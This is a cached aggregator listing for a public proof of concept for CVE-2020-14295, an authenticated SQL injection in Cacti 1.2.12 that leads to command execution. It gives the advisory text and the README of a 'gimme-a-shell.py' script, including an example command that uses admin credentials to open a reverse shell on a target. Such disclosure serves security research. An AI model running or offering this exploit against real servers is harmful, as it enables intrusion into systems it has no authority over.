CVE-2020-14295 PoC — Cacti SQL注入漏洞

Source

https://github.com/0z09e/CVE-2020-14295

Associated Vulnerability

Title:Cacti SQL注入漏洞 (CVE-2020-14295)
Description:Cacti是Cacti团队的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据，使用RRDtool绘画图形进行分析，并提供数据和用户管理功能。 Cacti 1.2.12版本中的color.php文件存在SQL注入漏洞。远程攻击者可借助‘filter’参数利用该漏洞执行任意命令。

Description

Authenticated SQL injection to command execution on Cacti 1.2.12

Readme

# CVE-2020-14295
***
Vulnerability details - https://github.com/Cacti/cacti/issues/3622

## Install
`pip3 install -r requirements.txt`

## Usage 
```
$ ./gimme-a-shell.py --help
usage: gimme-a-shell.py [-h] -t Target -U Username -P Password -i Shell-IP -p Shell-Port

optional arguments:
  -h, --help     show this help message and exit

required arguments:
  -t Target      Target URL
  -U Username    Cacti username
  -P Password    Cacti password
  -i Shell-IP    Reverse-Shell IP
  -p Shell-Port  Reverse-Shell Port
```
## Example 
`./gimme-a-shell.py -t http://cacti.localhost -U admin -P admin -i 127.0.0.1 -p 9001`

File Snapshot


 [4.0K]  /data/pocs/b9eda427ce31b0f2b47675138286c2176f64848d
├── [3.9K]  gimme-a-shell.py
├── [ 34K]  LICENSE
├── [ 621]  README.md
└── [   8]  requirements.txt

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!